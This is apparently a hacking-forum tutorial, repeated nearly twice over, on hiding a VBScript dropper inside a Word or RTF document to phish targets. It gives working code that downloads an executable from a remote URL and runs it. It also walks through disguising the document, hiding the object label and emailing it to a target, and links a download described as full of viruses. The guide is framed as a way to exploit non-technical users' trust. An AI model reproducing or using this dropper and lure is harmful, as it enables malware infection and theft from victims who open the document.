Trying to make people click on your executable is a art nowadays, even if all the hooks are set in your fake email there is a problem of not been possible to send the executable. A good choice is create a Word document (.doc) or a Rich Text Format (.rtf) and insert a object.
For this article i used a common vbs dropper that was configured to download and execute after the user double click in the object inside the document.
Most people thinks that Word document are only harmful if macro is activated, they are wrong.
101 lesson
1 - Let's do this. Save the following code as file.vbs
2 - Change http://127.0.0.1/1.exe to your remote file and keep C:\Windows\temp\file.exe as it is.
(Use your own exe instead of file.vbs as it is detected. This is for demo purpose only)
3 - Open Wordpad or Winword (In this example, i'm using Wordpad).
4 - Create a good document with a logo and add as many elements as you can to make it believable like signature, etc.
5 - Write the sentence "Double click below if not showing the image"
6 - And then click on "Insert a object"
7 - Select "Create from file" and select the vbs file
8 - Right click in the icon and "Packager Shell Object Object" > "Rename Package" and remove the "label"
9 - Save the document and send as attachment to your target email.
Note: This method works only with non tech people. The reason why this method works is because users have more trust in clicking in a link inside a document than clicking directly on a exe.
Download:
https://nitro.download/view/B7775A889651C87/Document.rar
Virus Scan: Full of virus for file.vbs
Not Scanned to not disclose method
For this article i used a common vbs dropper that was configured to download and execute after the user double click in the object inside the document.
Most people thinks that Word document are only harmful if macro is activated, they are wrong.
101 lesson
1 - Let's do this. Save the following code as file.vbs
- Code:
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", "http://127.0.0.1/1.exe", False
xHttp.Send
with bStrm
.type = 1 '
.open
.write xHttp.responseBody
.savetofile "C:\Windows\temp\file.exe", 2 '
end with
Set objShell = WScript.CreateObject("WScript.Shell")
objShell.Run("C:\Windows\temp\file.exe"), 1, True
2 - Change http://127.0.0.1/1.exe to your remote file and keep C:\Windows\temp\file.exe as it is.
(Use your own exe instead of file.vbs as it is detected. This is for demo purpose only)
3 - Open Wordpad or Winword (In this example, i'm using Wordpad).
4 - Create a good document with a logo and add as many elements as you can to make it believable like signature, etc.
5 - Write the sentence "Double click below if not showing the image"
6 - And then click on "Insert a object"
7 - Select "Create from file" and select the vbs file
8 - Right click in the icon and "Packager Shell Object Object" > "Rename Package" and remove the "label"
9 - Save the document and send as attachment to your target email.
Note: This method works only with non tech people. The reason why this method works is because users have more trust in clicking in a link inside a document than clicking directly on a exe.
Download:
https://nitro.download/view/B7775A889651C87/Document.rar
Virus Scan: Full of virus for file.vbs
Not Scanned to not disclose method